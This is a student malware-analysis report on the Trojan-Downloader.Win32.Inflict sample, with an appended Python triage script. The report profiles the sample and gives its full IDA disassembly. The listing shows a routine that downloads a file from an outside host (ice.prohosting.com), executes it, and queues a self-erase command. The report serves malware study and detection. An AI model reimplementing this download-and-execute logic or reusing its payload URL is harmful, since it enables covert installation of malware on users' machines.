Analysis of the Trojan-Downloader.Win32.Inflict virus
Student, group 4130: S. L. Bazanov
Name
Trojan-Downloader.Win32.Inflict
Executable file type
Portable executable for 80386 (PE)
Presumed programming language
Borland Delphi v6.0 – 7.0
Sections
.text, .rdata, .data, .rsrc, .idata
Entry point
00001000
Packer / protector
Not packed
Packed size / unpacked size
Not packed / 3584 bytes
Files modified
C:\WINDOWS\Prefetch\TROJAN-DOWNLOADER.WIN32.INFLI-2837B369.pf
Registry keys modified, and how
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Paths
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CacheLimit
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CacheLimit
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CacheLimit
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common AppData
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8455b302-9ae3-11e1-8b02-806d6172696f}\BaseClass
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8455b300-9ae3-11e1-8b02-806d6172696f}\BaseClass SUCCESS Type: REG_SZ, Length: 12, Data: Drive
Other malicious activity (description)
A Trojan program that downloads files from the Internet without the user's knowledge.
After launch, the Trojan waits for the infected computer to connect to the Internet, then attempts to download a file and save it.
The downloaded file is then executed.
Type of malware
Trojan downloader
Listing
See Appendix 1.
Libraries used / API functions
C:\WINDOWS\system32\kernel32.dll
C:\WINDOWS\system32\shell32.dll
C:\WINDOWS\system32\urlmon.dll
Functions:
ShellExecuteA (shell32.dll)
URLDownloadToFileA (urlmon.dll)
GetModuleFileNameA (kernel32.dll)
GetShortPathNameA (kernel32.dll)
lstrcatA (kernel32.dll)
ExitProcess (kernel32.dll)
Tools used
VirtualBox, IDA, PEiD v0.95, RDG Packer Detector v0.6.8, Process Monitor
Appendix 1
.text:00401000 ; File Name : C:\Documents and Settings\admin\Мои документы\Загрузки\Trojan-Downloader.Win32.Inflict\Trojan-Downloader.Win32.Inflict.exe
.text:00401000 ; Format : Portable executable for 80386 (PE)
.text:00401000 ; Imagebase : 400000
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00000088 ( 136.)
.text:00401000 ; Section size in file : 00000200 ( 512.)
.text:00401000 ; Offset to raw data for section: 00000400
.text:00401000 ; Flags 60000020: Text Executable Readable
.text:00401000 ; Alignment : default
.text:00401000 ; ===========================================================================
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:debug008, ss:debug008, ds:_data, fs:nothing, gs:nothing
.text:00401000
.text:00401000 ; =============== S U B R O U T I N E =======================================
.text:00401000
.text:00401000 public start
.text:00401000 start proc near
.text:00401000 push 0 ; LPBINDSTATUSCALLBACK
.text:00401002 push 0 ; DWORD
.text:00401004 push offset File ; "C:\\windows\\sys32sspcr.com"
.text:00401009 push offset aHttpIce_prohos ; "http://ice.prohosting.com/freebonb/sys3"...
.text:0040100E push 0 ; LPUNKNOWN
.text:00401010 call URLDownloadToFileA
.text:00401015 push 5 ; nShowCmd
.text:00401017 push 0 ; lpDirectory
.text:00401019 push 0 ; lpParameters
.text:0040101B push offset File ; "C:\\windows\\sys32sspcr.com"
.text:00401020 push 0 ; lpOperation
.text:00401022 push 0 ; hwnd
.text:00401024 call ShellExecuteA
.text:00401029 push 100h ; nSize
.text:0040102E push offset String2 ; lpFilename
.text:00401033 push 0 ; hModule
.text:00401035 call GetModuleFileNameA
.text:0040103A push 103h ; cchBuffer
.text:0040103F push offset String2 ; lpszShortPath
.text:00401044 push offset String2 ; lpszLongPath
.text:00401049 call GetShortPathNameA
.text:0040104E push offset String2 ; lpString2
.text:00401053 push offset String1 ; "C:\\Command.com /C Choice.com /C:YN /N /"...
.text:00401058 call lstrcatA
.text:0040105D push 0
.text:0040105F call $+5
.text:00401064 jmp ds:ExitProcess
.text:00401064 start endp
.text:00401064
.text:0040106A
.text:0040106A ; =============== S U B R O U T I N E =======================================
.text:0040106A
.text:0040106A ; Attributes: thunk
.text:0040106A
.text:0040106A ; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPSTR lpFilename, DWORD nSize)
.text:0040106A GetModuleFileNameA proc near ; CODE XREF: start+35 p
.text:0040106A jmp ds:__imp_GetModuleFileNameA
.text:0040106A GetModuleFileNameA endp
.text:0040106A
.text:00401070
.text:00401070 ; =============== S U B R O U T I N E =======================================
.text:00401070
.text:00401070 ; Attributes: thunk
.text:00401070
.text:00401070 ; DWORD __stdcall GetShortPathNameA(LPCSTR lpszLongPath, LPSTR lpszShortPath, DWORD cchBuffer)
.text:00401070 GetShortPathNameA proc near ; CODE XREF: start+49 p
.text:00401070 jmp ds:__imp_GetShortPathNameA
.text:00401070 GetShortPathNameA endp
.text:00401070
.text:00401076
.text:00401076 ; =============== S U B R O U T I N E =======================================
.text:00401076
.text:00401076 ; Attributes: thunk
.text:00401076
.text:00401076 ; LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2)
.text:00401076 lstrcatA proc near ; CODE XREF: start+58 p
.text:00401076 jmp ds:__imp_lstrcatA
.text:00401076 lstrcatA endp
.text:00401076
.text:0040107C
.text:0040107C ; =============== S U B R O U T I N E =======================================
.text:0040107C
.text:0040107C ; Attributes: thunk
.text:0040107C
.text:0040107C ; HRESULT __stdcall URLDownloadToFileA(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK)
.text:0040107C URLDownloadToFileA proc near ; CODE XREF: start+10 p
.text:0040107C jmp ds:__imp_URLDownloadToFileA
.text:0040107C URLDownloadToFileA endp
.text:0040107C
.text:00401082
.text:00401082 ; =============== S U B R O U T I N E =======================================
.text:00401082
.text:00401082 ; Attributes: thunk
.text:00401082
.text:00401082 ; HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd)
.text:00401082 ShellExecuteA proc near ; CODE XREF: start+24 p
.text:00401082 jmp ds:__imp_ShellExecuteA
.text:00401082 ShellExecuteA endp
.text:00401082
.text:00401082 ; ---------------------------------------------------------------------------
.text:00401088 dd 5Eh dup(0)
.text:00401200 dd 380h dup(0)
.text:00401200 _text ends
.text:00401200
.idata:00402000 ; Section 2. (virtual address 00002000)
.idata:00402000 ; Virtual size : 00000174 ( 372.)
.idata:00402000 ; Section size in file : 00000200 ( 512.)
.idata:00402000 ; Offset to raw data for section: 00000600
.idata:00402000 ; Flags 40000040: Data Readable
.idata:00402000 ; Alignment : default
.idata:00402000 ;
.idata:00402000 ; Imports from KERNEL32.dll
.idata:00402000 ;
.idata:00402000 ; ===========================================================================
.idata:00402000
.idata:00402000 ; Segment type: Externs
.idata:00402000 ; _idata
.idata:00402000 ; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPSTR lpFilename, DWORD nSize)
.idata:00402000 __imp_GetModuleFileNameA dd offset kernel32_GetModuleFileNameA
.idata:00402000 ; DATA XREF: GetModuleFileNameA r
.idata:00402000 ; .rdata:00402080 o
.idata:00402004 ; DWORD __stdcall GetShortPathNameA(LPCSTR lpszLongPath, LPSTR lpszShortPath, DWORD cchBuffer)
.idata:00402004 __imp_GetShortPathNameA dd offset kernel32_GetShortPathNameA
.idata:00402004 ; DATA XREF: GetShortPathNameA r
.idata:00402008 ; LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2)
.idata:00402008 __imp_lstrcatA dd offset kernel32_lstrcat ; DATA XREF: lstrcatA r
.idata:0040200C ; void __stdcall ExitProcess(UINT uExitCode)
.idata:0040200C ExitProcess dd offset kernel32_ExitProcess ; DATA XREF: start+64 r
.idata:00402010 db 4 dup(0)
.idata:00402014 ;
.idata:00402014 ; Imports from SHELL32.dll
.idata:00402014 ;
.idata:00402014 ; HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd)
.idata:00402014 __imp_ShellExecuteA dd offset shell32_ShellExecuteA
.idata:00402014 ; DATA XREF: ShellExecuteA r
.idata:00402014 ; .rdata:004020A8 o
.idata:00402018 db 4 dup(0)
.idata:0040201C ;
.idata:0040201C ; Imports from urlmon.dll
.idata:0040201C ;
.idata:0040201C ; HRESULT __stdcall URLDownloadToFileA(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK)
.idata:0040201C __imp_URLDownloadToFileA dd offset urlmon_URLDownloadToFileA
.idata:0040201C ; DATA XREF: URLDownloadToFileA r
.idata:0040201C ; .rdata:00402094 o
.idata:00402020 db 4 dup(0)
.idata:00402020
.rdata:00402024 ; ===========================================================================
.rdata:00402024
.rdata:00402024 ; Segment type: Pure data
.rdata:00402024 ; Segment permissions: Read
.rdata:00402024 _rdata segment para public 'DATA' use32
.rdata:00402024 assume cs:_rdata
.rdata:00402024 ;org 402024h
.rdata:00402024 ; char File[]
.rdata:00402024 File db 'C:\windows\sys32sspcr.com',0 ; DATA XREF: start+4 o
.rdata:00402024 ; start+1B o
.rdata:0040203E ; char aHttpIce_prohos[]
.rdata:0040203E aHttpIce_prohos db 'http://ice.prohosting.com/freebonb/sys32sspcr.com',0
.rdata:0040203E ; DATA XREF: start+9 o
.rdata:00402070 __IMPORT_DESCRIPTOR_KERNEL32 dd rva off_4020C0 ; Import Name Table
.rdata:00402074 dd 0 ; Time stamp
.rdata:00402078 dd 0 ; Forwarder Chain
.rdata:0040207C dd rva aKernel32_dll ; DLL Name
.rdata:00402080 dd rva __imp_GetModuleFileNameA ; Import Address Table
.rdata:00402084 __IMPORT_DESCRIPTOR_urlmon dd rva off_4020DC ; Import Name Table
.rdata:00402088 dd 0 ; Time stamp
.rdata:0040208C dd 0 ; Forwarder Chain
.rdata:00402090 dd rva aUrlmon_dll ; DLL Name
.rdata:00402094 dd rva __imp_URLDownloadToFileA ; Import Address Table
.rdata:00402098 __IMPORT_DESCRIPTOR_SHELL32 dd rva off_4020D4 ; Import Name Table
.rdata:0040209C dd 0 ; Time stamp
.rdata:004020A0 dd 0 ; Forwarder Chain
.rdata:004020A4 dd rva aShell32_dll ; DLL Name
.rdata:004020A8 dd rva __imp_ShellExecuteA ; Import Address Table
.rdata:004020AC db 0
.rdata:004020AD db 0
.rdata:004020AE db 0
.rdata:004020AF db 0
.rdata:004020B0 db 0
.rdata:004020B1 db 0
.rdata:004020B2 db 0
.rdata:004020B3 db 0
.rdata:004020B4 db 0
.rdata:004020B5 db 0
.rdata:004020B6 db 0
.rdata:004020B7 db 0
.rdata:004020B8 db 0
.rdata:004020B9 db 0
.rdata:004020BA db 0
.rdata:004020BB db 0
.rdata:004020BC db 0
.rdata:004020BD db 0
.rdata:004020BE db 0
.rdata:004020BF db 0
.rdata:004020C0 ;
.rdata:004020C0 ; Import names for KERNEL32.dll
.rdata:004020C0 ;
.rdata:004020C0 off_4020C0 dd rva word_4020F2 ; DATA XREF: .rdata:__IMPORT_DESCRIPTOR_KERNEL32 o
.rdata:004020C4 dd rva word_402108
.rdata:004020C8 dd rva word_40211C
.rdata:004020CC dd rva word_4020E4
.rdata:004020D0 dd 0
.rdata:004020D4 ;
.rdata:004020D4 ; Import names for SHELL32.dll
.rdata:004020D4 ;
.rdata:004020D4 off_4020D4 dd rva word_402158 ; DATA XREF: .rdata:__IMPORT_DESCRIPTOR_SHELL32 o
.rdata:004020D8 dd 0
.rdata:004020DC ;
.rdata:004020DC ; Import names for urlmon.dll
.rdata:004020DC ;
.rdata:004020DC off_4020DC dd rva word_402136 ; DATA XREF: .rdata:__IMPORT_DESCRIPTOR_urlmon o
.rdata:004020E0 dd 0
.rdata:004020E4 word_4020E4 dw 75h ; DATA XREF: .rdata:004020CC o
.rdata:004020E6 db 'ExitProcess',0
.rdata:004020F2 word_4020F2 dw 10Fh ; DATA XREF: .rdata:off_4020C0 o
.rdata:004020F4 db 'GetModuleFileNameA',0
.rdata:00402107 align 4
.rdata:00402108 word_402108 dw 139h ; DATA XREF: .rdata:004020C4 o
.rdata:0040210A db 'GetShortPathNameA',0
.rdata:0040211C word_40211C dw 2D3h ; DATA XREF: .rdata:004020C8 o
.rdata:0040211E db 'lstrcatA',0
.rdata:00402127 align 4
.rdata:00402128 aKernel32_dll db 'KERNEL32.dll',0 ; DATA XREF: .rdata:0040207C o
.rdata:00402135 align 2
.rdata:00402136 word_402136 dw 3Fh ; DATA XREF: .rdata:off_4020DC o
.rdata:00402138 db 'URLDownloadToFileA',0
.rdata:0040214B align 4
.rdata:0040214C aUrlmon_dll db 'urlmon.dll',0 ; DATA XREF: .rdata:00402090 o
.rdata:00402157 align 4
.rdata:00402158 word_402158 dw 6Eh ; DATA XREF: .rdata:off_4020D4 o
.rdata:0040215A db 'ShellExecuteA',0
.rdata:00402168 aShell32_dll db 'SHELL32.dll',0 ; DATA XREF: .rdata:004020A4 o
.rdata:00402174 align 1000h
.rdata:00402174 _rdata ends
.rdata:00402174
.data:00403000 ; Section 3. (virtual address 00003000)
.data:00403000 ; Virtual size : 00000138 ( 312.)
.data:00403000 ; Section size in file : 00000200 ( 512.)
.data:00403000 ; Offset to raw data for section: 00000800
.data:00403000 ; Flags C0000040: Data Readable Writable
.data:00403000 ; Alignment : default
.data:00403000 ; ===========================================================================
.data:00403000
.data:00403000 ; Segment type: Pure data
.data:00403000 ; Segment permissions: Read/Write
.data:00403000 _data segment para public 'DATA' use32
.data:00403000 assume cs:_data
.data:00403000 ;org 403000h
.data:00403000 ; char String1[]
.data:00403000 String1 db 'C:\Command.com /C Choice.com /C:YN /N /T:Y,10|erase ',0
.data:00403000 ; DATA XREF: start+53 o
.data:00403035 align 4
.data:00403038 ; char String2[]
.data:00403038 String2 db 1C8h dup(0) ; DATA XREF: start+2E o
.data:00403038 ; start+3F o ...
.data:00403200 align 1000h
.data:00403200 _data ends
.data:00403200
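As an added triage example (not part of the report), the following Python helper replays the push/call stream of the `start` routine from Appendix 1, recovers each stdcall argument list, and flags the download-then-execute chain a reviewer would look for; the listing excerpt is retyped from this page, and the names `recover_calls` and `triage` are chosen here.

```python
import re
# Constructed input: the download/execute/exit stretch of `start` from this page's listing, one instruction per line.
START_LISTING = r'''
.text:00401000 push 0 ; LPBINDSTATUSCALLBACK
.text:00401002 push 0 ; DWORD
.text:00401004 push offset File ; "C:\\windows\\sys32sspcr.com"
.text:00401009 push offset aHttpIce_prohos ; "http://ice.prohosting.com/freebonb/sys3"...
.text:0040100E push 0 ; LPUNKNOWN
.text:00401010 call URLDownloadToFileA
.text:00401015 push 5 ; nShowCmd
.text:00401017 push 0 ; lpDirectory
.text:00401019 push 0 ; lpParameters
.text:0040101B push offset File ; "C:\\windows\\sys32sspcr.com"
.text:00401020 push 0 ; lpOperation
.text:00401022 push 0 ; hwnd
.text:00401024 call ShellExecuteA
.text:0040105D push 0
.text:0040105F call $+5
.text:00401064 jmp ds:ExitProcess
'''
LINE_RE = re.compile(r'^\.text:[0-9A-Fa-f]+\s+(\w+)\s+(.*?)\s*(?:;\s*(.*))?$')

def resolve(operand, comment):
    """`offset NAME ; "literal"` -> the literal IDA shows (unescaped); else keep as-is."""
    if operand.startswith("offset "):
        m = re.match(r'"(.*)"', comment or "")
        return m.group(1).replace("\\\\", "\\") if m else operand.split()[1]
    return operand

def recover_calls(listing):
    """Replay the push/call stream. stdcall pushes arguments right-to-left, so
    reversing the pushes queued before a call yields them in declaration order."""
    stack, calls = [], []
    for line in listing.strip().splitlines():
        mnem, operand, comment = LINE_RE.match(line).groups()
        if mnem == "push":
            stack.append(resolve(operand, comment))
        elif mnem == "call" and operand.startswith("$"):
            continue  # `call $+5` only pushes a return address; the args stay queued
        elif mnem == "call" or (mnem == "jmp" and operand.startswith("ds:")):
            calls.append((operand.replace("ds:", ""), list(reversed(stack))))
            stack = []  # `jmp ds:X` through the IAT is a tail call; callee cleans args
    return calls

def triage(calls):
    """Flag the downloader pattern: a path written by URLDownloadToFileA (arg 2)
    that is later handed to ShellExecuteA as lpFile (also arg 2)."""
    dropped = {a[2]: a[1] for n, a in calls if n == "URLDownloadToFileA" and len(a) > 2}
    return [f"download-then-execute: {dropped[a[2]]} -> {a[2]}"
            for n, a in calls if n == "ShellExecuteA" and len(a) > 2 and a[2] in dropped]
```

The same replay shows the exit idiom as a plain `ExitProcess(0)`, which is why `call $+5` is skipped rather than treated as a call that consumes arguments.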